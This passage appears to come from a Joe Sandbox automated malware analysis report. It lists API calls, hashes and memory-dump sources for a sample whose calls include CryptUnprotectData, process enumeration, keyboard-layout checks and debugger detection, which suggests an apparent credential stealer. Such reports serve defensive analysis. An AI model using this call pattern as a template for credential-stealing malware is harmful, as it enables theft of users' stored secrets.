                                            • API String ID: 4291131564-3498640338
                                            • Opcode ID: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                            • Instruction ID: de78b312e53d8eb1032a325daaba17a5ad67a9fc4c37dbc2dcfee383a82f1a49
                                            • Opcode Fuzzy Hash: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                            • Instruction Fuzzy Hash: 3B11D474641308AFEB10CF64DC95FAA77B5EB88B04F208099FD159B3D0C776AA41CB50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: \u$\u${${$}$}
                                            • API String ID: 0-582841131
                                            • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                            • Instruction ID: fe348928ff125e7d62570d4c1bb3e84c746d7a1d8ed6a2037238e72822624230
                                            • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                            • Instruction Fuzzy Hash: B3415A22E19BD9C5CB058B7444A02AEBFB22FE6210F5D429BC4D91F383C775424AD3A5
                                            APIs
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                            • GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 02407FD8
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 02407FF0
                                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 02408004
                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 02408059
                                            • LocalFree.KERNEL32(00000000), ref: 02408119
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                            • String ID:
                                            • API String ID: 3090951853-0
                                            • Opcode ID: a4d0a0c2b3a684d2ad9d0c86ecadcb3cbe89c53720147a644a945addcb2b8918
                                            • Instruction ID: 68c128126812d2efba3e7936ad625be90dcc4ff67e210cd3d16feb42aa5c2c38
                                            • Opcode Fuzzy Hash: a4d0a0c2b3a684d2ad9d0c86ecadcb3cbe89c53720147a644a945addcb2b8918
                                            • Instruction Fuzzy Hash: 86410A71941228ABCB24DB95DCD8FEEB375EF44704F2041AAE10A66190DB746FC5CF51
                                            APIs
                                            • IsDebuggerPresent.KERNEL32 ref: 0240C109
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0240C11E
                                            • UnhandledExceptionFilter.KERNEL32(0041F2B0), ref: 0240C129
                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0240C145
                                            • TerminateProcess.KERNEL32(00000000), ref: 0240C14C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                            • String ID:
                                            • API String ID: 2579439406-0
                                            • Opcode ID: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                            • Instruction ID: 68ac8698de9a3e350428fcc686ca22a4795a9594a9cd4f104a6294e471231dd0
                                            • Opcode Fuzzy Hash: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                            • Instruction Fuzzy Hash: 5C21BDB9902214DFDB10DF6AF885A883BB4FB08314F52817FE91897261E7B199858F1D
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0), ref: 004072AD
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004072B4
                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004072E1
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407CF0,80000001,00416414), ref: 00407304
                                            • LocalFree.KERNEL32(?,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 0040730E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                            • String ID:
                                            • API String ID: 3657800372-0
                                            • Opcode ID: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                            • Instruction ID: 53cc3c192cf3f0b8553079c3b9831d6236397efc4a83699197ab53cf729bcbdc
                                            • Opcode Fuzzy Hash: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                            • Instruction Fuzzy Hash: 43010075E45308BBEB14DFA4DC45F9E7779AB44B00F104556FB05BA2C0D670AA009B55
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 023F7514
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 023F751B
                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 023F7548
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 023F756B
                                            • LocalFree.KERNEL32(?), ref: 023F7575
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                            • String ID:
                                            • API String ID: 2609814428-0
                                            • Opcode ID: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                            • Instruction ID: 9ceeebba11c837cc92cbf04180d4de01cb02509163366cbfcb3e4fc155a469b6
                                            • Opcode Fuzzy Hash: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                            • Instruction Fuzzy Hash: 36010CB5A45308BBDB10DFE8DD46F9DB779AB44B04F108146FB05AA2C0D7B0AB00CB65
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004197AE
                                            • Process32First.KERNEL32(00420ACE,00000128), ref: 004197C2
                                            • Process32Next.KERNEL32(00420ACE,00000128), ref: 004197D7
                                            • StrCmpCA.SHLWAPI(?,00000000), ref: 004197EC
                                            • CloseHandle.KERNEL32(00420ACE), ref: 0041980A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                            • String ID:
                                            • API String ID: 420147892-0
                                            • Opcode ID: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                            • Instruction ID: 1fbe04e52da5ee7ffdaa7b0a109f2e7c212eef70923f216ae4cda371332784c4
                                            • Opcode Fuzzy Hash: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                            • Instruction Fuzzy Hash: 49010C75E15209EBDB20DFA4CD54BDEB7B9BB08700F14469AE50996240E7349F80CF61
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02409A15
                                            • Process32First.KERNEL32(00420ACE,00000128), ref: 02409A29
                                            • Process32Next.KERNEL32(00420ACE,00000128), ref: 02409A3E
                                            • StrCmpCA.SHLWAPI(?,00000000), ref: 02409A53
                                            • CloseHandle.KERNEL32(00420ACE), ref: 02409A71
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                            • String ID:
                                            • API String ID: 420147892-0
                                            • Opcode ID: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                            • Instruction ID: c2dbc5e7c5e751b6bcfb8949c89767b2717ef2cbaa4c6dfc875735d7eeeba278
                                            • Opcode Fuzzy Hash: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                            • Instruction Fuzzy Hash: 66011E75A05248EBCB20DFA5CD84BDEB7B9BB08700F00419AF50997281EB709B80CF51
                                            APIs
                                            • CoCreateInstance.COMBASE(0041E120,00000000,00000001,0041E110,00000000), ref: 004139A8
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00413A00
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharCreateInstanceMultiWide
                                            • String ID: ,<A
                                            • API String ID: 123533781-3158208111
                                            • Opcode ID: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
                                            • Instruction ID: 4ceafe5fcd3fa6382eb1302e1b13d25b09f52af09297020757b8d8bc714daff3
                                            • Opcode Fuzzy Hash: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
                                            • Instruction Fuzzy Hash: A8410670A00A28AFDB24DF58CC95BDBB7B5AB48302F4041D9E608E7290E7B16EC5CF50
                                            APIs
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                              • Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
                                              • Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9
                                              • Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
                                              • Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
                                              • Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89
                                              • Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215E8,00420D79), ref: 023FE809
                                            • StrCmpCA.SHLWAPI(?,004215F0), ref: 023FE859
                                            • StrCmpCA.SHLWAPI(?,004215F4), ref: 023FE86F
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 023FEF46
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                            • String ID:
                                            • API String ID: 433455689-0
                                            • Opcode ID: f2c5642d96243640a0ff45e34ac7c9947fdf93cb12fee13133c104cf864f9802
                                            • Instruction ID: 0ab148b69e6a8c4b9463be41fccd9c657f43b494cca93d4921ca05024ba10826
                                            • Opcode Fuzzy Hash: f2c5642d96243640a0ff45e34ac7c9947fdf93cb12fee13133c104cf864f9802
                                            • Instruction Fuzzy Hash: AB12DA729013289ACB18FB61DCD5EED737AAF94305F4045BEA64A660D0EF345B88CF91
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 0041885A
                                            • Process32First.KERNEL32(?,00000128), ref: 0041886E
                                            • Process32Next.KERNEL32(?,00000128), ref: 00418883
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • CloseHandle.KERNEL32(?), ref: 004188F1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                            • String ID:
                                            • API String ID: 1066202413-0
                                            • Opcode ID: e6eae36bb9374a97c76adab8f6b270438b1d545086307427462bd1f80524a4b9
                                            • Instruction ID: f2962352e5a9518fad6621e76df9ccdb14d3c152e16a9ee82315e1f5505f4b94
                                            • Opcode Fuzzy Hash: e6eae36bb9374a97c76adab8f6b270438b1d545086307427462bd1f80524a4b9
                                            • Instruction Fuzzy Hash: 0E318171A02158ABCB24DF55DC55FEEB378EF04714F50419EF10A62190EB386B84CFA5
                                            APIs
                                            • CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000,?,004051D4), ref: 00419050
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: BinaryCryptString
                                            • String ID:
                                            • API String ID: 80407269-0
                                            • Opcode ID: ffe1fb48d7cc34e58daaddf9534e48f58287fa7ccb4c51b52f940144535c5183
                                            • Instruction ID: a6271c561c9c1d5471e6a4d7c0a7a185f0e3b346a55a3ee80b23d48c8130208f
                                            • Opcode Fuzzy Hash: ffe1fb48d7cc34e58daaddf9534e48f58287fa7ccb4c51b52f940144535c5183
                                            • Instruction Fuzzy Hash: 6C11F874604208EFDB00CF54D894BAB37A9AF89310F109449F91A8B350D779ED818BA9
                                            APIs
                                            • CryptBinaryToStringA.CRYPT32(00000000,023F543B,40000001,00000000,00000000,?,023F543B), ref: 024092B7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: BinaryCryptString
                                            • String ID:
                                            • API String ID: 80407269-0
                                            • Opcode ID: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                            • Instruction ID: 8547efb29692fbcb0861729f397129ec2114ab3a22a846fbecc61f937fe345fa
                                            • Opcode Fuzzy Hash: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                            • Instruction Fuzzy Hash: 5F111C74608209BFDB04CF54D884FAB33B9AF89B10F009569F9098B291D7B5E981CF60
                                            APIs
                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,023F51A5,00000000,00000000), ref: 023FA4A6
                                            • LocalAlloc.KERNEL32(00000040,?,?,?,023F51A5,00000000,?), ref: 023FA4B8
                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,023F51A5,00000000,00000000), ref: 023FA4E1
                                            • LocalFree.KERNEL32(?,?,?,?,023F51A5,00000000,?), ref: 023FA4F6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: BinaryCryptLocalString$AllocFree
                                            • String ID:
                                            • API String ID: 4291131564-0
                                            • Opcode ID: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                            • Instruction ID: 34f12425e54a44a2d4981d409d344593a7be749925535512f892253123c2ff37
                                            • Opcode Fuzzy Hash: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                            • Instruction Fuzzy Hash: 2011D274641309AFEB10CF64DC95FAA77B6FB88704F208049FE199B390C7B2AA40DB50
                                            APIs
                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
                                            • memcpy.MSVCRT(?,?,?), ref: 0040A316
                                            • LocalFree.KERNEL32(?), ref: 0040A323
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                            • String ID:
                                            • API String ID: 3243516280-0
                                            • Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                            • Instruction ID: b2ce5641e7fa807fe786f78e48a01c4c7ef199da86c861ee62a52048bf8154be
                                            • Opcode Fuzzy Hash: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                            • Instruction Fuzzy Hash: 3611ACB4900209DFCB04DF94D988AAE77B5FF88300F104559ED15A7350D734AE50CF61
                                            APIs
                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 023FA53B
                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 023FA55A
                                            • memcpy.MSVCRT(?,?,?), ref: 023FA57D
                                            • LocalFree.KERNEL32(?), ref: 023FA58A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                            • String ID:
                                            • API String ID: 3243516280-0
                                            • Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                            • Instruction ID: f90e85303a502c1895f7d5f1f97b7626b6cd14ce3a60a5dd33ff934932e2638e
                                            • Opcode Fuzzy Hash: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                            • Instruction Fuzzy Hash: C7118AB8A01209EFCB04DFA4D985AAEB7B5FF89304F108559FD1597350D770AA50CFA1
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00A70F40,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417BF3
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00A70F40,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417BFA
                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00A70F40,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417C0D
                                            • wsprintfA.USER32 ref: 00417C47
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                            • String ID:
                                            • API String ID: 362916592-0
                                            • Opcode ID: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                            • Instruction ID: b2a27aae97358dcb217157a2278e60ef806da717b76b9d8dbc6f71207b10123d
                                            • Opcode Fuzzy Hash: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                            • Instruction Fuzzy Hash: C011A1B1E0A228EBEB208B54DC45FA9BB79FB45711F1003D6F619932D0E7785A808B95
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: .$GetProcAddress.$l
                                            • API String ID: 0-2784972518
                                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                            • Instruction ID: 5bfd2631c23e799908e91e5e44e04decb8d9544099f98826c94581bca3620fa0
                                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                            • Instruction Fuzzy Hash: F1318AB6900609CFEB14CF99D880AAEBBF9FF08324F14404AD941A7325D771EA45CFA4
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • GetSystemTime.KERNEL32(?,00A69400,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: SystemTimelstrcpy
                                            • String ID:
                                            • API String ID: 62757014-0
                                            • Opcode ID: 31258d04424439a12f569067e4940d2fc891f11ff9f1757ae6140b7451ff642c
                                            • Instruction ID: 470bfa94025adedc24e37c5607c38d4270d2eadb7b78e810e6eac55b0552b998
                                            • Opcode Fuzzy Hash: 31258d04424439a12f569067e4940d2fc891f11ff9f1757ae6140b7451ff642c
                                            • Instruction Fuzzy Hash: 1211D331D011089FCB04EFA9D891AEE77BAEF58314F44C05EF41667185EF386984CBA6
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001D1D8), ref: 0041D21F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                            • Instruction ID: 17ba3a89fab13532ca0ccd526d59b343203315732a49a137553a0870c120f9dd
                                            • Opcode Fuzzy Hash: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                            • Instruction Fuzzy Hash: B19002F465151096860457755C4D5857A905E8D64675185A1AC06D4054DBA840409529
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(0041D1D8), ref: 0240D486
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
